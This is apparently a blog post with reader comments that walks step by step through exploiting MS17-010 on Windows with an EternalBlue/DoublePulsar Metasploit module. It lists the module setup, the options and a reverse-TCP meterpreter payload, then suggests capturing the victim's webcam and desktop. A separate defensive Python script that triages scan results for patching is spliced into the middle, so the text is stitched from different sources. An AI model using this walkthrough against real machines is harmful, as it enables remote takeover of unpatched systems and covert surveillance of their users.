Eternalblue and Doublepulsar with Metasploit

Just wanna share it..

I'm using this msf module: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.



Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).
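On the defensive side, the same scan tells you which of your own hosts still need the MS17-010 patch. The following is an added example, not part of the original post or the module's code: it sorts saved scanner output into hosts to patch, hosts reported not vulnerable, and hosts with no definitive result. The log line wording, the sample addresses and the function name triage are assumptions made for the illustration.

```python
import re

# Constructed sample of saved msfconsole output. The line wording is an
# assumption modelled on the smb_ms17_010 scanner and may differ by version.
SAMPLE = """\
[+] 192.168.56.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.56.11:445 - Host does NOT appear vulnerable.
[-] 192.168.56.12:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] Scanned 3 of 4 hosts (75% complete)
[+] 192.168.56.13:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
"""

# Only per-host result lines match; progress lines carry no host:port prefix.
LINE = re.compile(
    r"^\[(?P<mark>[+\-*])\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):\d+\s+-\s+(?P<msg>.*)$"
)

def triage(scan_output):
    """Sort scanned hosts into patch / ok / recheck buckets."""
    result = {"patch": {}, "ok": set(), "recheck": set()}
    for raw in scan_output.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        host, msg = m["host"], m["msg"]
        if m["mark"] == "+" and "VULNERABLE" in msg:
            # Text after the last " - " is the OS banner, if one was reported.
            result["patch"][host] = msg.rsplit(" - ", 1)[-1] if " - " in msg else "unknown OS"
        elif "NOT appear vulnerable" in msg:
            result["ok"].add(host)
        else:
            # Errors and timeouts prove nothing: never count these as patched.
            result["recheck"].add(host)
    # A definitive result for a host overrides an inconclusive line for it.
    result["recheck"] -= set(result["patch"]) | result["ok"]
    return result

if __name__ == "__main__":
    r = triage(SAMPLE)
    for host, os_banner in sorted(r["patch"].items()):
        print(f"PATCH   {host}  {os_banner}")
    for host in sorted(r["recheck"]):
        print(f"RECHECK {host}  no definitive scan result")
```
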



Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use the Eternalblue-Doublepulsar-Metasploit/deps/ directory, for example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget to set the PAYLOAD to windows/x64/meterpreter/reverse_tcp (my target uses x64, so I'm using an x64 payload too).

 

Once everything is set, run exploit.




Run some interesting commands like webcam_list or webcam_snap.

 



The victim's desktop screenshot.

 

Tested on my local network; tool used: Metasploit running in Kali Linux.
That's it, happy hacking!

2 Responses so far.

  1. Hello, I did "dpkg --add-architecture i386 && apt-get update && apt-get install wine32" and got stuck in a boot loop after reboot (enter root, password, press login, but it went back to the login screen). I am running Kali 2016.2, what can I do?



  2. I got this error in Metasploit. What am I doing wrong? I moved the files to the directory as shown in the video.
    sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
    wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"